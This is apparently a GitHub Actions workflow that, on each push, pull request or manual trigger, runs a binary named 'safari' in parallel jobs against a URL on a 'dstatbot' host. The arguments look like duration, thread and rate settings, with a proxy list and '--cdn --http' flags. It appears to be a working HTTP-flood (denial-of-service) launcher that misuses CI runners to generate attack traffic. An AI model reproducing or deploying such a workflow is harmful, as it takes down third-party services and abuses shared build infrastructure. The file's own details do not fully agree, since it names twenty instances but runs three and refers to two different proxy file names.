name: Run Script (20 Parallel Instances)

on:
  push:
    branches: [ main, master ]
  pull_request:
    branches: [ main, master ]
  workflow_dispatch:

jobs:
  run-script:
    runs-on: ubuntu-24.04
    strategy:
      fail-fast: false
      matrix:
        instance: [1, 2, 3]
    
    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Convert line endings and run safari (Instance ${{ matrix.instance }})
      run: |
        sudo apt-get update && sudo apt-get install -y dos2unix
        dos2unix safari proxies.txt
        chmod +x safari
        ./safari  https://c2.dstatbot.win/PlvBhjNM  700 10000 8000 proxy.txt --cdn --http
      continue-on-error: true
      
